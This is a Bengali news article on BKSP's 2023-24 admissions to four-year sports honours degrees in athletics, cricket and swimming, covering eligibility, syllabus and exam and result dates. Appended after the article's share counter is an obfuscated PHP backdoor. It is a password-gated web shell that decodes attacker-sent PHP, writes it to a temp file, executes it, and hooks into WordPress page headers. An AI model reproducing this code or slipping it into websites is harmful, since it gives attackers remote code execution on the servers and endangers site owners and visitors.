বিকেএসপিতে অ্যাথলেটিকস, ক্রিকেট ও সাঁতার বিষয়ে অনার্স করার সুযোগ


শিক্ষা সংবাদ প্রকাশের সময় : জুন ১২, ২০২৪, ১:১৪ অপরাহ্ণ /
বিকেএসপিতে অ্যাথলেটিকস, ক্রিকেট ও সাঁতার বিষয়ে অনার্স করার সুযোগ
0Shares

বাংলাদেশ ক্রীড়া শিক্ষা প্রতিষ্ঠানে (বিকেএসপি) ২০২৩-২৪ শিক্ষাবর্ষে চার বছর মেয়াদি ‘ব্যাচেলর অব স্পোর্টস স্টাডিজ’ কার্যক্রমে প্রথম বর্ষ স্নাতক (সম্মান) শ্রেণিতে শিক্ষার্থী ভর্তির জন্য বিজ্ঞপ্তি প্রকাশ করেছে। অ্যাথলেটিকস, ক্রিকেট ও সাঁতার বিষয়ে ছাত্রছাত্রী ভর্তি নেবে বিকেএসপি। আবেদনের শেষ তারিখ ২৩ জুন ২০২৪।

জাতীয় বিশ্ববিদ্যালয়ের অধিভুক্ত চার বছর মেয়াদি তিনটি কোর্সে ভর্তি হতে আবেদন করতে হবে অনলাইনে। আবেদন ফি ৩৫০ টাকা।

পৃথিবীর অনেক দেশে বিভিন্ন খেলার ওপর অনার্স বা স্নাতক পড়ার সুযোগ থাকলেও বাংলাদেশে সেটি ছিল না। গত বছর থেকে প্রথমবারের মতো ক্রিকেট, অ্যাথলেটিকস ও সাঁতারে অনার্স বা স্নাতক চালু করেছে বিকেএসপি। প্রথম বছর সাঁতার ও অ্যাথলেটিকসে প্রত্যাশিত মানসম্মত ছাত্রছাত্রী পাওয়া যায়নি বিধায় এই দুটি খেলায় কোনো শিক্ষার্থী ভর্তি করানো হয়নি। শুধু ক্রিকেটে ২৪ জন শিক্ষার্থীকে ভর্তি করানো হয়েছে বলে জানান বিকেএসপি কলেজের শিক্ষক।

এরই মধ্যে ২০২৩-২৪ শিক্ষাবর্ষে স্নাতক প্রথম বর্ষের ছাত্র-ছাত্রী ভর্তির বিজ্ঞপ্তি প্রকাশ করেছে প্রতিষ্ঠানটি।

আবেদনের যোগ্যতা :

* বিকেএসপিসহ বাংলাদেশের যেকোনো স্বীকৃত শিক্ষা বোর্ড বা উন্মুক্ত বিশ্ববিদ্যালয়ের যেকোনো শাখা থেকে ২০২২ ও ২০২৩ সালের এইচএসসি বা সমমান পরীক্ষায় (চতুর্থ বিষয়সহ) উত্তীর্ণ;

* ২০২০ ও ২০২১ সালের এসএসসি বা সমমান পরীক্ষায় (চতুর্থ বিষয়সহ) পৃথকভাবে ন্যূনতম জিপিএ-২ দশমিক ৫ সহ উভয় পরীক্ষায় সম্মিলিতভাবে কমপক্ষে জিপিএ-৬ প্রাপ্ত শিক্ষার্থীরা আবেদন করতে পারবেন;

* বিজ্ঞান শাখা/বাংলাদেশ কারিগরি শিক্ষাবোর্ড থেকে এইচএসসি (ভোকেশনাল) শাখা থেকে ২০২২–২৩ সালের এইসএসসি বা সমমান পরীক্ষায় (চতুর্থ বিষয়সহ) এবং ২০২০ ও ২০২১ সালের এসএসসি/সমমান পরীক্ষায় (চতুর্থ বিষয়সহ) পৃথকভাবে ন্যূনতম জিপিএ-৩ দশমিক উভয় পরীক্ষায় সম্মিলিতভাবে কমপক্ষে জিপিএ-৬.৫ প্রাপ্ত শিক্ষার্থীরা আবেদন করতে পারবেন।

* আবেদনকারী শিক্ষার্থীকে যেকোনো খেলায় জাতীয়, বিভাগীয় ও জেলা পর্যায়ে অংশগ্রহণের অভিজ্ঞতা থাকতে হবে।

* আবেদনকারী বীর মুক্তিযোদ্ধার সন্তান ও ক্ষুদ্র নৃগোষ্ঠী কোটায় আবেদন করতে পারবেন।

সিলেবাসের বিষয়বস্তু :

নিয়মিত শিক্ষার্থীদের মতো নিজ নিজ খেলার অনুশীলন তো থাকছেই। বিকেএসপি ক্রীড়া কলেজ কর্তৃক প্রণীত সিলেবাসে জোর দেওয়া হচ্ছে ক্রীড়াবিজ্ঞানের ওপর। পাশাপাশি থাকছে ক্রীড়া ব্যবস্থাপনা ও জাতীয় বিশ্ববিদ্যালয় কর্তৃক নির্ধারিত সর্বজনীন স্বাধীন বাংলাদেশের অভ্যুদয়ের ইতিহাসও। শেষ বর্ষে গিয়ে পড়তে হবে ক্রীড়া সাংবাদিকতার ওপর নির্দিষ্ট কোর্সও।

ভর্তি পরীক্ষার তারিখ :

ভর্তি পরীক্ষা অনুষ্ঠিত হবে সাভারের বিকেএসপিতে আগামী ২৭ জুন সকাল ৯টায়। ভর্তি ফরম অনলাইনে পূরণ করে প্রিন্ট কপি পরীক্ষার দিন সঙ্গে আনতে হবে। আবেদনকারীকে স্বাস্থ্য ও ক্রীড়ামেধা যাচাই পরীক্ষায় অংশ নিতে হবে এবং সংশ্লিষ্ট খেলার প্রয়োজনীয় পোশাক ও সরঞ্জাম সঙ্গে আনতে হবে।

* ভর্তিসংক্রান্ত বিস্তারিত নিয়ম কলেজ চলাকালে (সকাল ৯টা থেকে বেলা ১টা পর্যন্ত) বিকেএসপি, জিরানী, সাভারের কলেজ শাখা থেকে জানা যাবে।

* পরীক্ষার ফলাফল আগামী ৪ জুলাই বিকেএসপির ওয়েবসাইটে প্রকাশ করা হবে।

*ভর্তি পরীক্ষার নিয়মকানুন জানতে ক্লিক করুন এই লিংকে

বিকেএসপি ওয়েবসাইট

বিস্তারিত বিজ্ঞপ্তিতে

0Shares
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}